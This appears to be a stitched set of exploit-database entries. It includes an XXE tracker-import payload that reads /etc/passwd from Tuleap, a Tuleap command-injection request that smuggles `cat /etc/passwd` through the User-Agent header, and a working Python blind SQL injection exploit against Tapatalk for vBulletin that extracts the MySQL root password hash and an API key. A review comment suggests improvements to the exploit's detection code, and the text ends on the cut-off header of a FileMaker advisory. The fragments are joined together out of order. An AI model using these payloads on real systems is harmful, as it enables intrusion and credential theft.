<!DOCTYPE str [<!ENTITY xxe SYSTEM "/etc/passwd">]>
<tracker instantiate_for_new_projects="0">
<name>Bugs</name>
<item_name>bug</item_name>
<description>Bugs Tracker</description>
<cannedResponses/>
<formElements>
<formElement type="column" ID="F1" rank="120">
<name>column8</name>
<label>Column Top 1</label>
<formElements>
<formElement type="aid" ID="F2" rank="0">
<name>artifact_id</name>
<label>Artifact ID</label>
<description>Unique artifact identifier&xxe;</description>
</formElement>
<formElement type="subby" ID="F3" rank="1">
<name>submitted_by</name>
<label>Submitted by</label>
<description>User who originally submitted the artifact&xxe;</description>
</formElement>
</formElements>
</formElement>
<formElement type="column" ID="F4" rank="121">
<name>column10&xxe;</name>
<label>Column Top 2&xxe;</label>
<formElements>
<formElement type="lud" ID="F5" rank="0">
<name>last_update_date</name>
<label>Last Modified On&xxe;</label>
<description>Date and time of the latest modification in an artifact&xxe;</description>
</formElement>
<formElement type="subon" ID="F6" rank="2">
<name>open_date&xxe;</name>
<label>Submitted on&xxe;</label>
<description>Date and time for the initial artifact submission&xxe;</description>
</formElement>
</formElements>
</formElement>
<formElement type="fieldset" ID="F7" rank="132" required="1">
<name>fieldset_1</name>
<label>Details</label>
<description>fieldset_default_desc_key</description>
<formElements>
<formElement type="string" ID="F8" rank="0" required="1">
<name>summary</name>
<label>Summary</label>
<description>One line description of the artifact</description>
<properties maxchars="150" size="61"/>
</formElement>
<formElement type="text" ID="F9" rank="7">
<name>details</name>
<label>Original Submission</label>
<description>A full description of the artifact</description>
<properties rows="7" cols="80"/>
</formElement>
<formElement type="column" ID="F10" rank="8">
<name>column10</name>
<label>Column Details 1</label>
<formElements>
<formElement type="sb" ID="F11" rank="0">
<name>severity</name>
<label>Severity</label>
<description>Impact of the artifact on the system (Critical, Major,...)</description>
<bind type="static" is_rank_alpha="0">
<items>
<item ID="F11-V0" label="1 - Ordinary"/>
<item ID="F11-V1" label="2"/>
<item ID="F11-V2" label="3"/>
<item ID="F11-V3" label="4"/>
<item ID="F11-V4" label="5 - Major"/>
<item ID="F11-V5" label="6"/>
<item ID="F11-V6" label="7"/>
<item ID="F11-V7" label="8"/>
<item ID="F11-V8" label="9 - Critical"/>
</items>
<decorators>
<decorator REF="F11-V0" r="255" g="255" b="102"/>
<decorator REF="F11-V1" r="255" g="204" b="51"/>
<decorator REF="F11-V2" r="255" g="153" b="0"/>
<decorator REF="F11-V3" r="255" g="102" b="0"/>
<decorator REF="F11-V4" r="255" g="51" b="0"/>
<decorator REF="F11-V5" r="204" g="0" b="0"/>
<decorator REF="F11-V6" r="153" g="0" b="0"/>
<decorator REF="F11-V7" r="102" g="0" b="0"/>
<decorator REF="F11-V8" r="51" g="0" b="0"/>
</decorators>
</bind>
</formElement>
</formElements>
</formElement>
<formElement type="column" ID="F12" rank="12">
<name>column10</name>
<label>Column Details 2</label>
<formElements>
<formElement type="sb" ID="F13" rank="0">
<name>category</name>
<label>Category</label>
<description>Generally correspond to high level modules or functionalities of your software (e.g. User interface, Configuration Manager, Scheduler, Memory Manager...)</description>
<bind type="static" is_rank_alpha="0"/>
</formElement>
</formElements>
</formElement>
<formElement type="date" ID="F14" rank="20" use_it="0">
<name>close_date</name>
<label>End Date</label>
<description>End Date</description>
<properties default_value="today"/>
</formElement>
<formElement type="msb" ID="F15" rank="31" use_it="0">
<name>multi_assigned_to</name>
<label>Assigned to (multiple)</label>
<description>Who is in charge of this artifact</description>
<properties size="7"/>
<bind type="users">
<items>
<item label="group_members"/>
</items>
</bind>
</formElement>
</formElements>
</formElement>
<formElement type="fieldset" ID="F17" rank="283">
<name>fieldset1</name>
<label>Stage</label>
<formElements>
<formElement type="column" ID="F18" rank="0">
<name>column3</name>
<label>Stage 1</label>
<formElements>
<formElement type="sb" ID="F19" rank="2">
<name>status_id</name>
<label>Status</label>
<description>Artifact Status</description>
<bind type="static" is_rank_alpha="0">
<items>
<item ID="F19-V0" label="New"/>
<item ID="F19-V1" label="Unconfirmed"/>
<item ID="F19-V2" label="Verified"/>
<item ID="F19-V3" label="Resolved"/>
<item ID="F19-V4" label="Closed"/>
<item ID="F19-V5" label="Reopened"/>
</items>
</bind>
</formElement>
<formElement type="sb" ID="F20" rank="5" use_it="0">
<name>stage</name>
<label>Stage</label>
<description>Stage in the life cycle of the artifact</description>
<bind type="static" is_rank_alpha="0">
<items>
<item ID="F20-V0" label="New">
<description>The artifact has just been submitted</description>
</item>
<item ID="F20-V1" label="Analyzed">
<description>The cause of the artifact has been identified and documented</description>
</item>
<item ID="F20-V2" label="Accepted">
<description>The artifact will be worked on.</description>
</item>
<item ID="F20-V3" label="Under Implementation">
<description>The artifact is being worked on.</description>
</item>
<item ID="F20-V4" label="Ready for Review">
<description>Updated/Created non-software work product (e.g. documentation) is ready for review and approval.</description>
</item>
<item ID="F20-V5" label="Ready for Test">
<description>Updated/Created software is ready to be included in the next build</description>
</item>
<item ID="F20-V6" label="In Test">
<description>Updated/Created software is in the build and is ready to enter the test phase</description>
</item>
<item ID="F20-V7" label="Approved">
<description>The artifact fix has been succesfully tested. It is approved and awaiting release.</description>
</item>
<item ID="F20-V8" label="Declined">
<description>The artifact was not accepted.</description>
</item>
<item ID="F20-V9" label="Done">
<description>The artifact is closed.</description>
</item>
</items>
</bind>
</formElement>
</formElements>
</formElement>
<formElement type="column" ID="F21" rank="2">
<name>column4</name>
<label>Stage 2</label>
<formElements>
<formElement type="sb" ID="F22" rank="0">
<name>resolution</name>
<label>Resolution</label>
<description>The resolution field indicates what happened to the bug.</description>
<bind type="static" is_rank_alpha="0">
<items>
<item ID="F22-V0" label="Fixed"/>
<item ID="F22-V1" label="Will not fix"/>
<item ID="F22-V2" label="Invalid"/>
<item ID="F22-V3" label="Later"/>
<item ID="F22-V4" label="Duplicate"/>
<item ID="F22-V5" label="Remind"/>
<item ID="F22-V6" label="Works for me"/>
</items>
</bind>
</formElement>
</formElements>
</formElement>
<formElement type="column" ID="F23" rank="3">
<name>column9</name>
<label>Stage 3</label>
<formElements>
<formElement type="sb" ID="F24" rank="0" notifications="1">
<name>assigned_to</name>
<label>Assigned to</label>
<description>Who is in charge of solving the artifact</description>
<bind type="users">
<items>
<item label="group_members"/>
</items>
</bind>
</formElement>
</formElements>
</formElement>
</formElements>
</formElement>
<formElement type="fieldset" ID="F25" rank="284">
<name>fieldset1</name>
<label>Attachments</label>
<formElements>
<formElement type="file" ID="F26" rank="0">
<name>attachment</name>
<label>Attachments</label>
</formElement>
</formElements>
</formElement>
<formElement type="fieldset" ID="F27" rank="286">
<name>fieldset1</name>
<label>References</label>
<formElements>
<formElement type="cross" ID="F28" rank="0">
<name>cross_references</name>
<label>Cross references</label>
<description>List of items referenced by or referencing this item.</description>
</formElement>
<formElement type="art_link" ID="F29" rank="1" use_it="0">
<name>references</name>
<label>References</label>
<properties size="30"/>
</formElement>
</formElements>
</formElement>
<formElement type="fieldset" ID="F30" rank="287">
<name>fieldset1</name>
<label>Permissions</label>
<formElements>
<formElement type="perm" ID="F31" rank="0">
<name>permissions_on_artifact</name>
<label>Permissions on artifact</label>
<description>Let users groups to define who can access an artifact.</description>
</formElement>
</formElements>
</formElement>
<formElement type="sb" ID="F32" rank="26" use_it="0">
<name>platform</name>
<label>Platform</label>
<bind type="static" is_rank_alpha="0">
<items>
<item ID="F32-V0" label="Linux"/>
<item ID="F32-V1" label="Windows XP"/>
<item ID="F32-V2" label="Solaris"/>
<item ID="F32-V3" label="Windows 2000"/>
<item ID="F32-V4" label="Other"/>
</items>
</bind>
</formElement>
<formElement type="sb" ID="F33" rank="28" use_it="0">
<name>source</name>
<label>Source</label>
<description>Customer from which the request comes from.</description>
<bind type="static" is_rank_alpha="0"/>
</formElement>
<formElement type="sb" ID="F34" rank="30" use_it="0">
<name>version</name>
<label>Version</label>
<description>Product version concerned by the bug.</description>
<bind type="static" is_rank_alpha="0"/>
</formElement>
</formElements>
<semantics>
<semantic type="title">
<shortname>title</shortname>
<label>Titre</label>
<description>Définir le titre d'un artéfact</description>
<field REF="F8"/>
</semantic>
<semantic type="status">
<shortname>status</shortname>
<label>Ã?tat</label>
<description>Définir l'état d'un artifact</description>
<field REF="F19"/>
<open_values>
<open_value REF="F19-V0"/>
<open_value REF="F19-V1"/>
<open_value REF="F19-V2"/>
<open_value REF="F19-V3"/>
<open_value REF="F19-V5"/>
</open_values>
</semantic>
<semantic type="contributor">
<shortname>contributor</shortname>
<label>Contributor/assignee</label>
<description>Define the contributor/assignee of an artifact</description>
<field REF="F24"/>
</semantic>
<semantic type="tooltip">
<field REF="F2"/>
<field REF="F8"/>
<field REF="F19"/>
</semantic>
</semantics>
<reports>
<report is_default="0">
<name>Bugs</name>
<description>The system default artifact report</description>
<criterias>
<criteria rank="0">
<field REF="F19"/>
</criteria>
<criteria rank="1">
<field REF="F24"/>
</criteria>
<criteria rank="2">
<field REF="F6"/>
</criteria>
<criteria rank="3">
<field REF="F2"/>
</criteria>
<criteria rank="4">
<field REF="F5"/>
</criteria>
<criteria rank="5">
<field REF="F8"/>
</criteria>
<criteria rank="6">
<field REF="F9"/>
</criteria>
<criteria rank="7">
<field REF="F22"/>
</criteria>
<criteria rank="8">
<field REF="F13"/>
</criteria>
</criterias>
<renderers>
<renderer type="table" rank="0" chunksz="15" multisort="15">
<name>Results</name>
<columns>
<field REF="F2"/>
<field REF="F8"/>
<field REF="F6"/>
<field REF="F24"/>
<field REF="F3"/>
</columns>
</renderer>
<renderer type="plugin_graphontrackersv5" rank="1">
<name>Charts</name>
<description>Graphic Report</description>
<charts>
<chart type="pie" width="600" height="400" rank="0" base="F19">
<title>Status</title>
<description>Number of Artifacts by Status</description>
</chart>
<chart type="bar" width="600" height="400" rank="1" base="F11">
<title>Severity</title>
<description>Number of Artifacts by severity level</description>
</chart>
<chart type="pie" width="600" height="400" rank="2" base="F24">
<title>Assignment</title>
<description>Number of Artifacts by Assignee</description>
</chart>
</charts>
</renderer>
</renderers>
</report>
<report is_default="0">
<name>Default</name>
<description>The system default artifact report</description>
<criterias>
<criteria rank="0">
<field REF="F19"/>
</criteria>
<criteria rank="1">
<field REF="F24"/>
</criteria>
<criteria rank="2">
<field REF="F6"/>
</criteria>
<criteria rank="3">
<field REF="F2"/>
</criteria>
<criteria rank="4">
<field REF="F13"/>
</criteria>
</criterias>
<renderers>
<renderer type="table" rank="0" chunksz="15" multisort="15">
<name>Results</name>
<columns>
<field REF="F2"/>
<field REF="F8"/>
<field REF="F6"/>
<field REF="F24"/>
<field REF="F3"/>
</columns>
</renderer>
</renderers>
</report>
</reports>
<workflow>
<field_id REF="F19"/>
<is_used>1</is_used>
<transitions>
<transition>
<from_id REF="null"/>
<to_id REF="F19-V0"/>
</transition>
<transition>
<from_id REF="F19-V0"/>
<to_id REF="F19-V1"/>
</transition>
<transition>
<from_id REF="F19-V0"/>
<to_id REF="F19-V2"/>
</transition>
<transition>
<from_id REF="F19-V0"/>
<to_id REF="F19-V4"/>
</transition>
<transition>
<from_id REF="F19-V1"/>
<to_id REF="F19-V2"/>
</transition>
<transition>
<from_id REF="F19-V1"/>
<to_id REF="F19-V4"/>
</transition>
<transition>
<from_id REF="F19-V3"/>
<to_id REF="F19-V4"/>
</transition>
<transition>
<from_id REF="F19-V4"/>
<to_id REF="F19-V5"/>
</transition>
<transition>
<from_id REF="F19-V5"/>
<to_id REF="F19-V3"/>
</transition>
<transition>
<from_id REF="F19-V5"/>
<to_id REF="F19-V4"/>
</transition>
<transition>
<from_id REF="F19-V0"/>
<to_id REF="F19-V3"/>
</transition>
<transition>
<from_id REF="F19-V1"/>
<to_id REF="F19-V3"/>
</transition>
<transition>
<from_id REF="F19-V2"/>
<to_id REF="F19-V3"/>
</transition>
<transition>
<from_id REF="F19-V2"/>
<to_id REF="F19-V4"/>
</transition>
</transitions>
</workflow>
<permissions>
<permission scope="tracker" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_ACCESS_FULL"/>
<permission scope="field" REF="F2" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F3" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F5" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F6" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F8" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F8" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
<permission scope="field" REF="F8" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
<permission scope="field" REF="F9" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F9" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
<permission scope="field" REF="F9" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
<permission scope="field" REF="F11" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F11" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
<permission scope="field" REF="F11" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
<permission scope="field" REF="F13" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F13" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
<permission scope="field" REF="F13" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
<permission scope="field" REF="F14" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F14" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
<permission scope="field" REF="F14" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
<permission scope="field" REF="F15" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F15" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
<permission scope="field" REF="F15" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
<permission scope="field" REF="F19" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F19" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
<permission scope="field" REF="F19" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
<permission scope="field" REF="F20" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F20" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
<permission scope="field" REF="F20" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
<permission scope="field" REF="F22" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F22" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
<permission scope="field" REF="F22" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
<permission scope="field" REF="F24" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F24" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
<permission scope="field" REF="F24" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
<permission scope="field" REF="F26" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F26" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
<permission scope="field" REF="F26" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
<permission scope="field" REF="F28" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F29" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F29" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
<permission scope="field" REF="F29" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
<permission scope="field" REF="F31" ugroup="UGROUP_PROJECT_ADMIN" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
<permission scope="field" REF="F32" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F32" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
<permission scope="field" REF="F32" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
<permission scope="field" REF="F33" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F33" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
<permission scope="field" REF="F33" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
<permission scope="field" REF="F34" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F34" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
<permission scope="field" REF="F34" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
<!--TODO TRACKER_ADMIN <permission scope="field" REF="F31" ugroup="UGROUP_PLUGIN_TRACKER_ADMIN" type="PLUGIN_TRACKER_FIELD_UPDATE"/> -->
</permissions>
</tracker>
-----------------------------12077103611061
Content-Disposition: form-data; name="name"
Bugs
-----------------------------12077103611061
Content-Disposition: form-data; name="description"
Bugs Tracker
-----------------------------12077103611061
Content-Disposition: form-data; name="itemname"
bug
-----------------------------12077103611061
Content-Disposition: form-data; name="Create"
Créer
-----------------------------12077103611061--
2) The server will respond giving back a 'tracker number' in the response. The response contain link to specific "tracker" which will be similar to the following:
https://[ip]/plugins/tracker/?group_id=102&tracker=12
3) Using retrieved tracker number and URL, a XXE can be trigerred by visiting the retrieved URL:
https://[ip]/plugins/tracker/?group_id=102&tracker=12
Further details at:
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-7177/
Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.

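--- /dev/null
+++ b/platforms/php/webapps/35100.txt
@@ -0,0 +1,41 @@
+Vulnerability title: Tuleap <= 7.4.99.5 Remote Command Execution in Enalean Tuleap
+CVE: CVE-2014-7178
+Vendor: Enalean
+Product: Tuleap
+Affected version: 7.4.99.5 and earlier
+Fixed version: 7.5
+Reported by: Jerzy Kramarz
+Details:
+Tuleap does not validate the syntax of the requests submitted to SVN handler pages in order to validate weather request passed to passthru() function are introducing any extra parameters that would be executed in the content of the application.
+This vulnerability can be exploited by external attackers to introduce external commands into the workflow of the application that would execute them as shown on the attached Proof Of Concept code below.
+After registering with the application and sending a request similar to the one below the vulnerability can be triggered:
+GET /svn/viewvc.php/?roottype=svn&root=t11 HTTP/1.1
+Host: [IP]
+User-Agent: M" && cat /etc/passwd > /usr/share/codendi/src/www/passwd.txt && "ozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://[IP]/svn/?group_id=102
+Cookie: PHPSESSID=2uqjkd0iupn84gigi4e1tekg95; TULEAP_session_hash=362a9e41d1a93c8f195db4ccc6698ef5
+Connection: keep-alive
+Cache-Control: max-age=0
+Note: In order to exploit this vulnerability a user needs to be in position to see SVN repository.
+Further details at:
+https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-7178/
+Copyright:
+Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
+Disclaimer:
+The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.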

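--- /dev/null
+++ b/platforms/php/webapps/35102.py
@@ -0,0 +1,233 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+'''
+@author: tintinweb 0x721427D8
+'''
+import urllib2, urllib
+import xmlrpclib,re, urllib2,string,itertools,time
+from distutils.version import LooseVersion
+class Exploit(object):
+def __init__(self, target, debug=0 ):
+self.stopwatch_start=time.time()
+self.target = target
+self.path = target
+self.debug=debug
+if not self.target.endswith("mobiquo.php"):
+self.path = self.detect_tapatalk()
+if not self.path:
+raise Exception("Could not detect tapatalk or version not supported!")
+self.rpc_connect()
+self.attack_func = self.attack_2
+def detect_tapatalk(self):
+# request page, check for tapatalk banner
+handlers = [
+urllib2.HTTPHandler(debuglevel=self.debug),
+urllib2.HTTPSHandler(debuglevel=self.debug),
+]
+ua = urllib2.build_opener(*handlers)
+ua.addheaders = [('User-agent', 'Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3')]
+data = ua.open(self.target).read()
+if self.debug:
+print data
+if not "tapatalkDetect()" in data:
+print "[xx] could not detect tapatalk. bye..."
+return None
+# extract tapatalk version
+print "[ i] Taptalk detected ... ",
+path = "".join(re.findall(r"^\s*<link href=[\s'\"]?(http://.*?/)smartbanner/appbanner.css", data, re.MULTILINE|re.DOTALL))
+path+="mobiquo.php"
+print "'%s' ... "%path,
+data = urllib.urlopen(path).read()
+version = "".join(re.findall(r"Current Tapatalk plugin version:\s*([\d\.a-zA-Z]+)", data))
+if LooseVersion(version) <= LooseVersion("5.2.1"):
+print "v.%s :) - OK"%version
+return path
+print "v.%s :( - not vulnerable"%version
+return None
+def rpc_connect(self):
+self.rpc = xmlrpclib.ServerProxy(self.path,verbose=self.debug)
+def attack_1(self, sqli, sleep=2):
+'''
+SELECT subscribethreadid
+FROM subscribethread AS subscribethread
+LEFT JOIN user AS user ON (user.userid=subscribeforum.userid)
+WHERE subscribethreadid = <INJECTION>
+AND subscribethreadid.userid = 0";
+<INJECTION>: 1 UNION ALL <select_like_probe> OR FALSE
+'''
+query = "-1 union %s and ( select sleep(%s) ) "%(sqli,sleep)
+query += "union select subscribethreadid from subscribethread where 1=1 OR 1=1" # fix query for "AND subscribeforum.userid=0"
+if self.debug:
+print """ SELECT subscribethreadid
+FROM subscribethread AS subscribethread
+LEFT JOIN user AS user ON (user.userid=subscribethread.userid)
+WHERE subscribethreadid = %s
+AND subscribethread.userid = 0"""%query
+return self.rpc.unsubscribe_topic("s_%s"%query) #no escape, invalid_char="_"
+def attack_2(self, sqli, sleep=2):
+'''
+SELECT subscribeforumid
+FROM subscribeforum AS subscribeforum
+LEFT JOIN user AS user ON (user.userid=subscribeforum.userid)
+WHERE subscribeforumid = <INJECTION>
+AND subscribeforum.userid = 0";
+<INJECTION>: 1 UNION ALL <select_like_probe> OR FALSE
+'''
+query = "-1 union %s and ( select sleep(%s) ) "%(sqli,sleep)
+query += "union select subscribeforumid from subscribeforum where 1=1 OR 1=1" # fix query for "AND subscribeforum.userid=0"
+if self.debug:
+print """ SELECT subscribeforumid
+FROM subscribeforum AS subscribeforum
+LEFT JOIN user AS user ON (user.userid=subscribeforum.userid)
+WHERE subscribeforumid = %s
+AND subscribeforum.userid = 0"""%query
+return self.rpc.unsubscribe_forum("s_%s"%query) #no escape, invalid_char="_"
+def attack_blind(self,sqli,sleep=2):
+return self.attack_func(sqli,sleep=sleep)
+#return self.attack_func("-1 OR subscribethreadid = ( %s AND (select sleep(4)) ) UNION SELECT 'aaa' FROM subscribethread WHERE subscribethreadid = -1 OR 1 "%sqli)
+def attack_blind_guess(self,query, column, charset=string.ascii_letters+string.digits,maxlength=32, sleep=2, case=True):
+'''
+provide <query> = select -1 from user where user='debian-sys-maint' where <COLUMN> <GUESS>
+'''
+hit = False
+# PHASE 1 - guess entry length
+print "[ ] trying to guess length ..."
+for guess_length in xrange(maxlength+1):
+q = query.replace("<COLUMN>","length(%s)"%column).replace("<GUESS>","= %s"%guess_length)
+self.stopwatch()
+self.attack_blind(q, sleep)
+duration = self.stopwatch()
+print ".",
+if duration >= sleep-sleep/8:
+# HIT! - got length! => guess_length
+hit = True
+print ""
+break
+if not hit:
+print "[ !!] unable to guess password length, check query!"
+return None
+print "[ *] LENGTH = %s"%guess_length
+# PHASE 2 - guess password up to length
+print "[ ] trying to guess value ..."
+hits = 0
+result = ""
+for pos in xrange(guess_length):
+# for each char pos in up to guessed length
+for attempt in self.bruteforce(charset, 1):
+# probe all chars in charset
+#attempt = re.escape(attempt)
+if attempt == "%%":
+attempt= "\%"
+#LIKE binary = case sensitive.might be better to do caseinsensitive search + recheck case with binary
+q = query.replace("<COLUMN>",column).replace("<GUESS>","LIKE '%s%s%%' "%(result,attempt))
+self.stopwatch()
+self.attack_blind(q, sleep)
+duration = self.stopwatch()
+#print result,attempt," ",duration
+print ".",
+if duration >= sleep-sleep/8:
+if case:
+# case insensitive hit - recheck case: this is drastically reducing queries needed.
+q = query.replace("<COLUMN>",column).replace("<GUESS>","LIKE binary '%s%s%%' "%(result,attempt.lower()))
+self.stopwatch()
+self.attack_blind(q, sleep)
+duration = self.stopwatch()
+if duration >= sleep-sleep/8:
+attempt = attempt.lower()
+else:
+attempt = attempt.upper()
+# case sensitive - end
+# HIT! - got length! => guess_length
+hits += 1
+print ""
+print "[ +] HIT! - %s[%s].."%(result,attempt)
+result += attempt
+break
+if not hits==guess_length:
+print "[ !!] unable to guess password length, check query!"
+return None
+print "[ *] SUCCESS!: query: %s"%(query.replace("<COLUMN>",column).replace("<GUESS>","='%s'"%result))
+return result
+def bruteforce(self, charset, maxlength):
+return (''.join(candidate)
+for candidate in itertools.chain.from_iterable(itertools.product(charset, repeat=i)
+for i in range(1, maxlength + 1)))
+def stopwatch(self):
+stop = time.time()
+diff = stop - self.stopwatch_start
+self.stopwatch_start=stop
+return diff
+if __name__=="__main__":
+#googledork: https://www.google.at/search?q=Tapatalk+Banner+head+start
+DEBUG = False
+TARGET = "http://TARGET/vbb4/forum.php"
+x = Exploit(TARGET,debug=DEBUG)
+print "[ ] TAPATALK for vBulletin 4.x - SQLi"
+print "[--] Target: %s"%TARGET
+if DEBUG: print "[--] DEBUG-Mode!"
+print "[ +] Attack - sqli"
+query = u"-1 UNION SELECT 1%s"%unichr(0)
+if DEBUG:
+print u""" SELECT subscribeforumid
+FROM subscribeforum AS subscribeforum
+LEFT JOIN user AS user ON (user.userid=subscribeforum.userid)
+WHERE subscribeforumid = %s
+AND subscribeforum.userid = 0"""%query
+print "[ *] guess mysql user/pass"
+print x.attack_blind_guess("select -1 from mysql.user where user='root' and <COLUMN> <GUESS>",
+column="password",
+charset="*"+string.hexdigits,
+maxlength=45) # usually 40 chars + 1 (*)
+print "[ *] guess apikey"
+print x.attack_blind_guess("select -1 from setting where varname='apikey' and <COLUMN> <GUESS>",
+column='value',
+charset=string.ascii_letters+string.digits,
+maxlength=14,
+)
+print "-- done --"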
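Review bot: In `detect_tapatalk` both `"".join(re.findall(...))` results (the `<link href=…smartbanner/appbanner.css` path and the `Current Tapatalk plugin version:` string) can be empty, and nothing checks for that: `path` then degrades to the bare relative `mobiquo.php`, and an empty `version` appears to compare below `5.2.1` under `LooseVersion`, so an unparseable banner is reported as a detected version rather than as unknown. Add `if not path: return None` before the `path+="mobiquo.php"` line and `if not version: return None` before the `LooseVersion` comparison, so the check only reports a result it could actually read. As a point of style, `urllib2` is imported twice (`import urllib2, urllib` and again on the next line); fold these into a single import block. The module docstring carries only an author tag; it should state what the script checks and that it is Python 2 only (`print` statements, `urllib2`, `xrange`, `unichr`), since none of that is documented.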


@ -0,0 +1,64 @@
Filemaker Login Bypass and Privilege Escalation
=======================================================================
[ADVISORY INFORMATION]
Title: Filemaker Login Bypass and Privilege Escalation
Discovery date: 19/10/2014
Release date: 19/10/2014
Vendor Homepage: www.filemaker.com
Version: Filemaker Pro 13.0v3 - FileMaker Pro Advanced 12.0v4
Credits: Giuseppe D'Amore (http://it.linkedin.com/pub/giuseppe-d-amore/69/37/66b)
